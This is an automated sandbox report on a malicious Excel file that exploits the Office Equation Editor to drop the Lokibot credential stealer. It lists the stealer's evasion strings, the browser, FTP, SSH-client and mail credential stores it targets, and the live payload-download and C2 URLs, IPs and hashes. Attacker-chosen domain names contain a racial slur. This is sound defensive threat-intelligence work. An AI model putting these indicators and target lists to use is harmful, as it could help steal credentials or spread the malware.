Source: C:\Users\Public\vbc.exe TID: 2944	Thread sleep time: -41500s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2916	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2496	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2496	Thread sleep time: -2100000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2496	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2496	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

5_2_00403D74

Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	Binary or memory string: VMWARE8
Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II8
Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	Binary or memory string: QEMU8
Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	Binary or memory string: VMwareHDNm
Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	Binary or memory string: VMware HDNm
Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	Binary or memory string: VMWAREHDNm
Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	Binary or memory string: Mm%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\8
Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	Binary or memory string: Mm"SOFTWARE\VMware, Inc.\VMware Tools8
Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	Binary or memory string: vmware8

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 5_2_0040317B mov eax, dword ptr fs:[00000030h]

5_2_0040317B

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00402B7C GetProcessHeap,RtlAllocateHeap,

5_2_00402B7C

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe {path}			Jump to behavior

Source: vbc.exe, 00000005.00000002.2391902240.0000000000F20000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000005.00000002.2391902240.0000000000F20000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000005.00000002.2391902240.0000000000F20000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation	Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00406069 GetUserNameW,

5_2_00406069

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Lokibot

Show sources

Source: Yara match	File source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3040, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2952, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db	Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\Public\vbc.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Show sources

Source: C:\Users\Public\vbc.exe	Code function: PopPassword		5_2_0040D069
Source: C:\Users\Public\vbc.exe	Code function: SmtpPassword		5_2_0040D069

Source: Yara match	File source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3040, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution13	Path Interception	Extra Window Memory Injection1	Disable or Modify Tools11	OS Credential Dumping2	Account Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer15	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Access Token Manipulation1	Deobfuscate/Decode Files or Information1	Credentials in Registry2	File and Directory Discovery2	Remote Desktop Protocol	Man in the Browser1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection112	Obfuscated Files or Information41	Security Account Manager	System Information Discovery13	SMB/Windows Admin Shares	Data from Local System2	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing22	NTDS	Security Software Discovery211	Distributed Component Object Model	Email Collection1	Scheduled Transfer	Application Layer Protocol124	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Timestomp1	LSA Secrets	Virtualization/Sandbox Evasion2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Extra Window Memory Injection1	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading111	DCSync	System Owner/User Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion2	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Access Token Manipulation1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection112	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
MV NAGOYA TRADER.xlsx	32%	Virustotal		Browse
MV NAGOYA TRADER.xlsx	25%	ReversingLabs	Document-Word.Trojan.Heuristic

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	100%	Joe Sandbox ML
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	33%	ReversingLabs	Win32.Trojan.Wacatac
C:\Users\Public\vbc.exe	33%	ReversingLabs	Win32.Trojan.Wacatac

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.vbc.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File
4.2.vbc.exe.e80000.2.unpack	100%	Avira	HEUR/AGEN.1109526		Download File

Domains

Source	Detection	Scanner	Label	Link
begadi.ga	12%	Virustotal		Browse
chnesstdyqudusisabadassniggainthestfmv.ydns.eu	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://chnesstdyqudusisabadassniggainthestfmv.ydns.eu/secure/svchost.exe	6%	Virustotal		Browse
http://chnesstdyqudusisabadassniggainthestfmv.ydns.eu/secure/svchost.exe	100%	Avira URL Cloud	malware
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://begadi.ga/chud/gate.php	13%	Virustotal		Browse
http://begadi.ga/chud/gate.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
begadi.ga	185.193.143.118	true	true	12%, Virustotal, Browse	unknown
chnesstdyqudusisabadassniggainthestfmv.ydns.eu	103.141.138.119	true	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://chnesstdyqudusisabadassniggainthestfmv.ydns.eu/secure/svchost.exe	true	6%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://begadi.ga/chud/gate.php	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.%s.comPA	vbc.exe, 00000005.00000002.2391988009.0000000002600000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	vbc.exe, 00000005.00000002.2391988009.0000000002600000.00000002.00000001.sdmp	false		high
http://www.ibsensoftware.com/	vbc.exe, vbc.exe, 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.141.138.119	unknown	Viet Nam		135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	true
185.193.143.118	unknown	Russian Federation		43830	DIGITALENERGY-ASRU	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	332678
Start date:	21.12.2020
Start time:	08:31:47
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	MV NAGOYA TRADER.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winXLSX@6/8@182/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 29.4% (good quality ratio 26.3%) Quality average: 68.3% Quality standard deviation: 34.5%
HCA Information:	Successful, ratio: 96% Number of executed functions: 114 Number of non-executed functions: 21
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:33:19	API Interceptor	67x Sleep call for process: EQNEDT32.EXE modified
08:33:22	API Interceptor	911x Sleep call for process: vbc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
103.141.138.119	MV NEW WIND.xlsx	Get hash	malicious	Browse	wsdychnesqudusisabadassniggainthewsbkw.ydns.eu/secure/svchost.exe
	Payment list.xlsx	Get hash	malicious	Browse	wsdychnesqudusisabadassniggainthewsbkw.ydns.eu/secure/svchost.exe
	MT Tordis Knutsen_20CF18909.xlsx	Get hash	malicious	Browse	chnesstdyqudusisabadassniggainthestgls.ydns.eu/secure/svchost.exe
	MV CAPTAIN SEA.xlsx	Get hash	malicious	Browse	chnesstdyqudusisabadassniggainthestgls.ydns.eu/secure/svchost.exe
	MV Hyundai Voyager.xlsx	Get hash	malicious	Browse	chnesstdyqudusisabadassniggainthestgls.ydns.eu/secure/svchost.exe
	MV OCEAN CRYSTAL.xlsx	Get hash	malicious	Browse	wsdychnesqudusisabadassniggainthewsbkq.ydns.eu/secure/svchost.exe
	RFQ 12-20.xlsx	Get hash	malicious	Browse	chnessndyqudusisabadassniggainthesnoop.ydns.eu/secure/svchost.exe
	Soa.xlsx	Get hash	malicious	Browse	chnessndyqudusisabadassniggainthesnoop.ydns.eu/secure/svchost.exe
185.193.143.118	MT TBN.xlsx	Get hash	malicious	Browse	webtex.ga/akin/gate.php
	MV JIN SHENG SHUI.xlsx	Get hash	malicious	Browse	begadi.ga/kayo/gate.php
	7Ic3eiRuEv.exe	Get hash	malicious	Browse	begadi.ga/chud/gate.php
	tElBu1fWfG.exe	Get hash	malicious	Browse	begadi.ga/chud/gate.php
	MV TBN.xlsx	Get hash	malicious	Browse	webtex.ga/akin/gate.php
	MV NEW WIND.xlsx	Get hash	malicious	Browse	begadi.ga/chud/gate.php
	TMB-CI2006-003.xlsx	Get hash	malicious	Browse	begadi.ga/kayo/gate.php
	SecuriteInfo.com.ArtemisDED64E567DBA.exe	Get hash	malicious	Browse	webtex.ga/akin/gate.php
	SecuriteInfo.com.BehavesLike.Win32.Generic.hc.exe	Get hash	malicious	Browse	begadi.ga/kayo/gate.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
begadi.ga	MV JIN SHENG SHUI.xlsx	Get hash	malicious	Browse	185.193.143.118
	7Ic3eiRuEv.exe	Get hash	malicious	Browse	185.193.143.118
	tElBu1fWfG.exe	Get hash	malicious	Browse	185.193.143.118
	MV NEW WIND.xlsx	Get hash	malicious	Browse	185.193.143.118
	TMB-CI2006-003.xlsx	Get hash	malicious	Browse	185.193.143.118
	SecuriteInfo.com.BehavesLike.Win32.Generic.hc.exe	Get hash	malicious	Browse	185.193.143.118
	SecuriteInfo.com.Trojan.PackedNET.405.10494.exe	Get hash	malicious	Browse	176.118.165.175
	GlobalSuppl_RFQ_8W9.xlsx	Get hash	malicious	Browse	176.118.165.175
	AUEhcNNYn5.exe	Get hash	malicious	Browse	176.118.165.175
	2Q2RgXBORF.exe	Get hash	malicious	Browse	176.118.165.175
	PO_RFQ82920_GlobalSuppl_.xlsx	Get hash	malicious	Browse	176.118.165.175
	KOyrUyOISf.exe	Get hash	malicious	Browse	176.118.165.175
	XPjCFNIYA7.exe	Get hash	malicious	Browse	176.118.165.175
	7KHnPipjN9.exe	Get hash	malicious	Browse	176.118.165.175
	MV CAPTAIN SEA.xlsx	Get hash	malicious	Browse	176.118.165.175
	aquYBtxJYY.exe	Get hash	malicious	Browse	176.118.165.175
	_PO_8392_Globalsuppl_.xlsx	Get hash	malicious	Browse	176.118.165.175
	SecuriteInfo.com.Trojan.PWS.Stealer.29680.21070.exe	Get hash	malicious	Browse	176.118.165.175
	MV Hyundai Voyager.xlsx	Get hash	malicious	Browse	176.118.165.175
	12U72AeB5B.exe	Get hash	malicious	Browse	176.118.165.175

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	SKM_C258201001130020005057.exe	Get hash	malicious	Browse	103.99.1.128
	Order Acknowledgement - 133410.xlsx	Get hash	malicious	Browse	103.125.191.187
	MT TBN.xlsx	Get hash	malicious	Browse	103.141.138.122
	New Import and Export Regulation.xlsx	Get hash	malicious	Browse	103.141.138.118
	MV JIN SHENG SHUI.xlsx	Get hash	malicious	Browse	103.141.138.123
	fdwv4hWF1M.exe	Get hash	malicious	Browse	103.78.94.94
	MV TBN.xlsx	Get hash	malicious	Browse	103.141.138.122
	MV NEW WIND.xlsx	Get hash	malicious	Browse	103.141.138.119
	Quotation Doc Invoice.xlsx	Get hash	malicious	Browse	103.125.191.187
	INVOICE AND PACKING LIST.xlsx	Get hash	malicious	Browse	103.125.191.5
	TMB-CI2006-003.xlsx	Get hash	malicious	Browse	103.141.138.123
	GlobalSuppl_RFQ_8W9.xlsx	Get hash	malicious	Browse	103.141.138.126
	Payment.jar	Get hash	malicious	Browse	180.214.236.99
	PO Request- 02201756801.xlsx	Get hash	malicious	Browse	103.125.191.229
	PT.Sari ContractPT.Sari Proforma.pda.xlsx	Get hash	malicious	Browse	103.125.191.187
	Payment list.xlsx	Get hash	malicious	Browse	103.141.138.119
	MAERSK KLEVEN V.949E.xlsx	Get hash	malicious	Browse	103.141.138.122
	Image16122020.exe	Get hash	malicious	Browse	103.99.1.128
	Xeron_Scan02117110021.exe	Get hash	malicious	Browse	103.99.1.128
	MT Tordis Knutsen_20CF18909.xlsx	Get hash	malicious	Browse	103.141.138.119
DIGITALENERGY-ASRU	MT TBN.xlsx	Get hash	malicious	Browse	185.193.143.118
	MV JIN SHENG SHUI.xlsx	Get hash	malicious	Browse	185.193.143.118
	7Ic3eiRuEv.exe	Get hash	malicious	Browse	185.193.143.118
	tElBu1fWfG.exe	Get hash	malicious	Browse	185.193.143.118
	MV TBN.xlsx	Get hash	malicious	Browse	185.193.143.118
	MV NEW WIND.xlsx	Get hash	malicious	Browse	185.193.143.118
	TMB-CI2006-003.xlsx	Get hash	malicious	Browse	185.193.143.118
	SecuriteInfo.com.ArtemisDED64E567DBA.exe	Get hash	malicious	Browse	185.193.143.118
	SecuriteInfo.com.BehavesLike.Win32.Generic.hc.exe	Get hash	malicious	Browse	185.193.143.118
	SecuriteInfo.com.Trojan.PackedNET.405.10494.exe	Get hash	malicious	Browse	176.118.165.175
	GlobalSuppl_RFQ_8W9.xlsx	Get hash	malicious	Browse	176.118.165.175
	SecuriteInfo.com.Trojan.PWS.Siggen2.60864.9279.exe	Get hash	malicious	Browse	176.118.165.175
	SecuriteInfo.com.Trojan.PackedNET.405.12933.exe	Get hash	malicious	Browse	176.118.165.175
	Payment_Advice_pdf.exe	Get hash	malicious	Browse	176.118.165.175
	Enq2381813839_pdf.exe	Get hash	malicious	Browse	176.118.165.175
	PO Request- 02201756801.xlsx	Get hash	malicious	Browse	176.118.165.175
	Payment_Advice_pdf.exe	Get hash	malicious	Browse	176.118.165.175
	Enq2381813839_pdf.exe	Get hash	malicious	Browse	176.118.165.175
	Payment list.xlsx	Get hash	malicious	Browse	176.118.165.175
	MAERSK KLEVEN V.949E.xlsx	Get hash	malicious	Browse	176.118.165.175

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	584704
Entropy (8bit):	7.31402329860771
Encrypted:	false
SSDEEP:	12288:ek3fNrqcsXP04X8QGETcxAtAHp5LcPgKaIJVPfHAZ0xnJWBIlO+T2U7H:vfYJ/04XuE0Agp54PH
MD5:	3EE960D7D595C82B47CE28164AFED056
SHA1:	FD750607C392744A3302538C2A0B0FE810D199BB
SHA-256:	7596F11C31683CC9137672D261E19B4DD61952BAD97545080A1663AB475283B2
SHA-512:	F5432D376F7390C3A4EAD25CD167286FB9B99421354302AFF7739B30AB2DF825EAE16D05DE1308268DF27B60B01F8150A42707C7B6367A5D051E0AD443A49462
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 33%
Reputation:	low
IE Cache URL:	http://chnesstdyqudusisabadassniggainthestfmv.ydns.eu/secure/svchost.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....V................0.................. ... ....@.. .......................`............@.....................................S.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........................V...{...........................................].:....w..H.3...c.abf............%..........;x;x. @...o.p.1.........G.e..W..@+...Qx..".B.Y.\|^..C...3&..S..~........../......uv/@..iMM.%.....'.......=1.4z..\|.)..Q\.KU...M.A{.\|...;...51.F.lp..e..niy...C....U1\M.Ri......(..R?..EN.%....v~..l........#$...)J.B=.5.q...@U.G.....e..c.z....Zu...A.Wua)b.1...`..:<^...A\){...;...,...g..2.......?p{x@...D'.%..e`$x..hP........8O...VZ........#.ck.p-.T...V

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3CDE7269.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9981CA08.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1099960
Entropy (8bit):	2.015316229530797
Encrypted:	false
SSDEEP:	3072:qXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:oahIFdyiaT2qtXw
MD5:	B40BF8F31F83A568F9E58B72151B217F
SHA1:	46673DEEFAB7DC50094AA9B090EB74CCB1809F61
SHA-256:	3F4B8A687BC4A0FF42F0FEB2E1195C57B437F77FE956FCA4D76851685D7E1A8A
SHA-512:	57528718DF801D37374A2E5BD77F29A9A1CF84161D71E17345B83F2769D64695687DD06CE82C814E16208BB0F89EE13D15100A5D2DB495D653F72223D367328B
Malicious:	false
Reputation:	low
